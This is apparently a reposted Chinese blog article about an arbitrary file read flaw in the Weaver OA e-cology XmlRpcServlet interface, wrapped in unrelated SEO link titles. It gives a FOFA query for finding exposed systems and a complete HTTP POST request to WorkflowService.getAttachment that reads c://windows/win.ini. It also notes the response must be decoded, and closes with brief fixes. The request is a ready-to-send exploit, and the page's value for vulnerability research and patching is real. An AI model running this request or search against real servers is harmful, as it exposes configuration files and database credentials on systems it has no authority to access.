当前位置: 首页 > news >正文

咨询公司靠什么盈利seo推广代运营

咨询公司靠什么盈利,seo推广代运营,网站页面的优化,wordpress重写页面样式漏洞介绍 泛微新一代移动办公平台e-cology不仅组织提供了一体化的协同工作平台,将组织事务逐渐实现全程电子化,改变传统纸质文件、实体签章的方式。泛微OA E-Cology 平台XmRpcServlet接口处存在任意文件读取漏洞,攻击者可通过该漏洞读取系统重要文件 (如数据库配置…

漏洞介绍

泛微新一代移动办公平台e-cology不仅组织提供了一体化的协同工作平台,将组织事务逐渐实现全程电子化,改变传统纸质文件、实体签章的方式。泛微OA E-Cology 平台XmRpcServlet接口处存在任意文件读取漏洞,攻击者可通过该漏洞读取系统重要文件 (如数据库配置文件、系统配置文件) 、数据库配置文件等等,导致网站处于极度不安全状态。

FOFA

app=“泛微-OA(e-cology)”

漏洞复现

读取win.ini文件

POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/xml
Accept-Encoding: gzip
Content-Length: 218
Connection: keep-alive<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>WorkflowService.getAttachment</methodName>
<params>
<param>
<value><string>c://windows/win.ini</string></value>
</param>
</params>
</methodCall>

在这里插入图片描述
对返回的密文进行解码
在这里插入图片描述

修复建议

官方已修复该漏洞,请用户联系商修复漏洞: https://www.weaver.com.cn/cs/securityDownload.htm
通过防火墙等安全设备设置访问策略,设置白名单访问。
如非必要,禁止公网访问该系统.

http://www.mmbaike.com/news/41168.html

相关文章:

  • php做网站如何架构网站推广seo招聘
  • 深圳的网站建设公司pestl分析2023今日新闻头条
  • 网络营销推广师北京优化seo排名优化
  • 专注东莞微信网站建设短视频营销的特点
  • 伊宁网站建设百度官方平台
  • wordpress文章seo方法湖南seo公司
  • 要建一个网站怎么做趣丁号友情链接
  • 网站后台补丁如何做市场调研公司排名
  • 什么颜色做网站好看百度统计工具
  • 企业网站制作建设的框架有哪几种搜索引擎推广的基本方法
  • 光做网站推广咋样北京seo人员
  • 如何做自己公司网站推广产品的软文怎么写
  • 中企动力科技股份有限公司怎么样找seo外包公司需要注意什么
  • 网站招聘方案怎么做宁波网站推广怎么做
  • 海南省住房和城乡建设厅网站网上版营销培训心得体会
  • 网站建设私活中能找网站网络营销
  • 团购网站平台建设刷赞业务推广网站
  • 荆州网站建设公司常见的推广方式
  • 手机版自适应网站怎么做淘宝标题优化工具推荐
  • 如何自制作网站国际新闻 军事
  • wordpress.en温州seo网站建设
  • 找人做短视频网站搜索引擎营销的方法有哪些
  • wp网站源码百度seo灰色词排名代发
  • 招聘网站建设指数函数图像
  • 做pc端软件可以参考那些网站汕头seo收费
  • 鲁谷网站建设软文批发网
  • 济南企业网站设计公司官网seo关键词排名系统
  • 凡科做网站是否安全安徽新站优化
  • 湖南省公司注册网站seo 优化思路
  • 中航建设集团有限公司网站北京seo推广系统